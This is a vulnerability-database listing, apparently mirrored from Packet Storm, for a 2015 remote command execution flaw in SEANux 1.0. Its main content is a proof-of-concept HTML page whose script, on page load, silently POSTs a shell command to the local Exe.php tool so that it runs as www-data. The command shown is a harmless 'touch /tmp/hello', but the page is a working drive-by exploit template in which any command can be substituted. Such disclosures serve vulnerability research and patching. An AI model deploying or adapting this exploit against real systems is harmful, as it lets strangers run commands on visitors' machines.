Lucene search
+L

SEANux 1.0 Remote Command Execution

🗓️ 12 Feb 2015 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

SEANux 1.0 Remote Command Execution on SEANux v1.0 allows execution of commands as www-data

Code
`<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/   
Larry W. Cashdollar  
@_larry0  
2/9/2015  
Browse to this page using any browser in SEANux v1.0 to execute commands as www-data.  
--!>  
  
<html>  
<head>  
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>  
<script>  
$(document).ready(function(){  
$.post("http://localhost/tools/Exe.php",  
{  
cmd: "touch /tmp/hello",  
execute: "Execute"  
},  
function(data,status){  
alert("Data: " + data + "\nResult: " + status);  
});  
});  
</script>  
</head>  
<body>  
<h2>  
Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.  
</h2>  
<hr>  
<br>  
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation